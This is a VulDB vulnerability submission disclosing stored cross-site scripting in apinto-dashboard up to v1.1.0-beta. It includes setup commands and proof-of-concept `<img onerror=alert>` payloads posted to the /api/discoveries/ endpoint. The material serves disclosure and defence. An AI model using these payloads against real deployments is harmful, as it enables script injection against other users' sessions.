Enviar #50340: apinto-dashboard Multiple authenticated store XSS in apinto-dashboard <= v1.1.0-betainformación

Títuloapinto-dashboard Multiple authenticated store XSS in apinto-dashboard <= v1.1.0-beta
Descripciónrepo: https://github.com/eolinker/apinto-dashboard 1,Download and unzip the installation package Apinto 2,Start gateway 3,Download and unzip the installation package Apinto Dashboard 4,Start Apinto Dashboard ```bash wget https://github.com/eolinker/apinto/releases/download/v0.8.0/apinto-v0.8.0.linux.x64.tar.gz && tar -zxvf apinto-v0.8.0.linux.x64.tar.gz && cd apinto ./apinto start cd .. wget https://github.com/eolinker/apinto-dashboard/releases/download/v1.1.0-beta/apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && tar -zxvf apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && cd apinto-dashboard ./apinto-dashboard ``` This problem exists in most pages with tables. For example, on the/discoveries/list page, add an item at random and enter `<img src=1 onerror=alert(/xss/)>` in the description Then click Details to trigger. Request URL: /api/discoveries/ Request Method: POST PostData: {"health_on":false,"name":"1<img src=1 onerror=alert(111)>","driver":"static","description":"<img src=1 onerror=alert(222)>"} ![XroR8.png](https://c2.im5i.com/2022/11/01/XroR8.png) ![Xr9Zz.png](https://c2.im5i.com/2022/11/01/Xr9Zz.png) ![Xr3pU.png](https://c2.im5i.com/2022/11/01/Xr3pU.png) ![XrZPw.png](https://c2.im5i.com/2022/11/01/XrZPw.png) Reported by Neppah(@Tomy) from QSec-Team of Cyber Security Department at Qi'anxin Group on 2022-11-01.
Usuario
 Tomy (UID 34751)
Sumisión2022-11-01 12:09 (hace 4 años)
Moderación2022-11-01 16:47 (5 hours later)
EstadoAceptado
Entrada de VulDB212639 [eolinker apinto-dashboard /api/discoveries/ secuencias de comandos en sitios cruzados]
Puntos17

AnteriorVisión De ConjuntoPróximo

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!